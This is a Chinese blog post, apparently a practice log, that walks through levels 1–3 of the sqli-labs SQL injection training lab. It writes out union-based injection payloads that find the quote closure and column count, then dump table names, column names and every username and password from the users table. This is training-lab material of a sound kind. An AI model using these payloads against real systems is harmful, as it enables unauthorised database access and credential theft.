sqli-labs-master sql注入靶场（1-3）

最新推荐文章于 2024-05-29 08:30:00 发布

Wrypot

最新推荐文章于 2024-05-29 08:30:00 发布

阅读量110

点赞数

分类专栏： sql注入 ctf练习记录文章标签： sql 数据库 mysql

本文链接：https://blog.csdn.net/qq_56664029/article/details/129628985

版权

ctf练习记录同时被 2 个专栏收录

15 篇文章 0 订阅

订阅专栏

sql注入

6 篇文章 0 订阅

订阅专栏

sqli-labs-master sql注入靶场（1-3）
pass-01
在这里插入图片描述
sql注入七步法

?id=1
在这里插入图片描述
1、求闭合
当闭合字符为’的时候
and 1=1的时候没报错
and1=2时候报错，所以闭合字符为’

2、改为and 1=1 然后order by试到3的时候没报错，试到4的时候报错，说明是三列的

3、改回and1=2，然后看回显点，这里是2和3
在这里插入图片描述
4、爆库
2的地方改为database()
库为security

5、爆表
2的地方改为

(select group_concat(table_name) from information_schema.tables where table_schema=database())

库下有四张表
emails,referers,uagents,users

在这里插入图片描述
6、爆列
将2的地方改为

(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database())

user表里有这三列
id,username,password
在这里插入图片描述
7、爆字段
将2的位置改为

(select group_concat(id,username,password) from users

爆出所有用户名和密码

在这里插入图片描述
pass-02

第二题什么闭合字符都不用加
and1=1时候没有报错
and1=2时候报错
必须是一个报错，另一个没有报错才算闭合成功
这里什么符号都不用加
一般我们用’ ‘’ ') ‘’)
这些符号来测试闭合

这里注意一个细节，order by 的时候，前面是and 1=1
union select的时候前面要是and1=2
回显点是2和3
在这里插入图片描述

爆表
group_concat(table_name) from information_schema.tables where table_schema=database()
爆列
group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database()
爆字段
group_concat(id,username,password) from users

pass-03
在这里插入图片描述
求闭合
当符号是’)
的时候，and1=1没有报错
and1=2报错，所以闭合字符为’)
爆库爆表爆列爆字段跟上面一样

Wrypot

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs-master sql注入靶场（1-3）

2、改为and 1=1 然后order by试到3的时候没报错，试到4的时候报错，说明是三列的。这里注意一个细节，order by 的时候，前面是and 1=1。union select的时候前面要是and1=2。3、改回and1=2，然后看回显点，这里是2和3。and1=2时候报错，所以闭合字符为’and1=2报错，所以闭合字符为’)的时候，and1=1没有报错。爆库爆表爆列爆字段跟上面一样。and 1=1的时候没报错。and1=1时候没有报错。库为security。and1=2时候报错。
复制链接

扫一扫